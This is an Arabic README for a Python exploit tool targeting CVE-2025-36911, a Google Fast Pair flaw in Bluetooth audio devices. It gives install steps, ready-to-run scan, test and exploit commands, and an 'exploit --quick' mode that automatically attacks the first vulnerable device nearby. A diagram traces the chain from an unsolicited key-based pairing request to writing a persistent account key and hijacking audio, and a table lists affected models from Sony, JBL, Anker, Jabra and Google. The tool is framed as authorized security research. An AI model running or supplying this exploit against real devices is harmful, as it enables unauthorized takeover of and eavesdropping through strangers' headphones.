
إكسبلويت لثغرة CVE-2025-36911 في Python لاختبار معداتنا الخاصة
أداة استغلال سريعة لثغرة CVE-2025-36911 مكتوبة بلغة Python لاختبار أجهزتنا
المؤلف: Sébastien Dudek (@FlUxIuS) @ Penthertz
الفضل: whisperpair.eu لاكتشاف الثغرة، وتطبيق APK الرائع من @ZalexDev الذي اختصر وقت التنفيذ wpair-app
لأغراض البحث الأمني المصرّح به فقط. اختبر على الأجهزة التي تملكها فقط.
CVE-2025-36911 تؤثر على تطبيقات Google Fast Pair في ملايين أجهزة الصوت التي تعمل بتقنية Bluetooth.
السلوك الطبيعي: يجب أن تقبل الأجهزة طلبات الاقتران فقط عندما تكون في وضع الاقتران (الضغط مع الاستمرار على الزر، فتح العلبة، إلخ.)
السلوك القابل للاستغلال: تقبل الأجهزة طلبات Key-Based Pairing (KBP) في أي وقت، حتى عندما تكون خاملة أو مقترنة مسبقًا.
# التثبيت
pip install bleak cryptography
git clone https://github.com/Penthertz/CVE-2025-36911-exploit.git
cd CVE-2025-36911-exploit
# فحص الأهداف
python3 whisperpair-cli.py scan
# اختبار قابلية الاستغلال
python3 whisperpair-cli.py test AA:BB:CC:DD:EE:FF
# الاستغلال
python3 whisperpair-cli.py exploit --quick
┌─────────────────────────────────────────────────────────────┐
│ المهاجم الجهاز القابل للاستغلال │
│ │
│ 1. فحص BLE ─────────────────────► إعلان Fast Pair │
│ (العثور على الهدف) (معرّف الطراز ظاهر) │
│ │
│ 2. الاتصال ──────────────────────► اتصال GATT │
│ │
│ 3. طلب KBP ──────────────────────► خاصية Key-Based Pairing │
│ (يجب أن يتم رفضه ✗ لم يتم الرفض! │
│ عند عدم وجود وضع اقتران) (CVE-2025-36911) │
│ │
│ 4. تحليل الاستجابة ◄────────────── عنوان BR/EDR │
│ │
│ 5. كتابة مفتاح الحساب ────────────► خاصية Account Key │
│ (وصول دائم) ✓ تم القبول │
│ │
│ 6. اقتران BT الكلاسيكي ─────────────► ملفات الصوت (A2DP) │
│ (انتهت اللعبة) │
└─────────────────────────────────────────────────────────────┘
تحاول الأداة عدة استراتيجيات تلقائيًا:
تم اختبارها وهي قابلة للاستغلال (تحقق من تحديثات البرامج الثابتة):
| الأمر | الوصف |
|---|
scan | فحص BLE مباشر محدّث لأجهزة Fast Pair |
scan -a | فحص جميع أجهزة BLE |
info <addr> | عرض خدمات وخصائص GATT |
test <addr> | فحص قابلية الاستغلال دون إحداث ضرر |
exploit <addr> | سلسلة الاستغلال الكاملة |
exploit -q | فحص تلقائي + استغلال أول هدف |
| العلامة التجارية | الطرازات |
|---|
| Pixel Buds Pro 2 (لكنها تتلقى التحديثات بسرعة كبيرة مع هواتف Pixel) | |
| Sony | WH-1000XM4, WH-1000XM5/XM6, LinkBuds S, WH-CH520 |
| JBL | JBL TUNE BEAM |
| Anker | Soundcore Liberty 4 NC |
| Jabra | Elite 8 Active |
| والمزيد | whisperpair.eu |